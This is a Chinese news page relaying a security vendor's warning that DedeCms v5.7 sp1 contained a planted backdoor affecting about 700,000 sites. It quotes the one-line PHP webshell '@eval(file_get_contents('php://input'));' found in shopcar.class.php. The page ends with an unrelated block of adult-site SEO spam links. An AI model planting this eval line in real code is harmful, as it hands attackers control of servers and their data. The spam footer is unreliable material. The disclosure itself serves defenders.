返回頂部
關閉軟件導航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統現后門70萬網站資料恐不保

瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。據CMS官方數據顯示,目前約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員,使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。

wangluo1.jpg  

  據專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。

  

  織夢CMS系統現后門70萬網站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網站后,便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統,此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。

如果您覺得 織夢CMS系統現后門70萬網站資料恐不保 這篇文章對您有用,請分享給您的好友,謝謝
文章地址:http://www.meyanliao.com/article/dede/1066.html
解放雙手無盡可能,有問題添加天線貓微信
主站蜘蛛池模板: 国产精品一级毛片无码视频| 在线观看无码AV网址| 无码人妻AⅤ一区二区三区水密桃| 久久午夜伦鲁片免费无码| 精品亚洲AV无码一区二区三区 | 国产av无码专区亚洲av毛片搜| 内射无码午夜多人| 中文有码无码人妻在线| 亚洲欧洲日产国码无码网站| 无码av天天av天天爽| 91精品国产综合久久四虎久久无码一级 | 亚洲精品无码Av人在线观看国产| 中文AV人妻AV无码中文视频| 中文字幕乱妇无码AV在线| 国产精品无码亚洲一区二区三区| 无码人妻精品一区二区三区久久| 一道久在线无码加勒比| 亚洲av成人中文无码专区| 久久久久久亚洲av成人无码国产 | 国产在线无码一区二区三区视频| 亚洲精品无码mⅴ在线观看 | 亚洲午夜无码久久久久| 日韩精品人妻系列无码av东京 | 性生交片免费无码看人| 无码一区二区三区在线观看| 国产无码网页在线观看| 无码人妻av一区二区三区蜜臀| 青青草无码免费一二三区| 无码精品一区二区三区在线| 亚洲一区二区三区AV无码 | 亚洲va无码va在线va天堂| 亚洲AV无码乱码在线观看| 无码国产激情在线观看| 激情无码人妻又粗又大中国人| 久久久人妻精品无码一区| av无码aV天天aV天天爽| 亚洲va中文字幕无码| 日韩人妻无码精品系列| 国产精品无码AV不卡| 亚洲一本到无码av中文字幕| 无码囯产精品一区二区免费|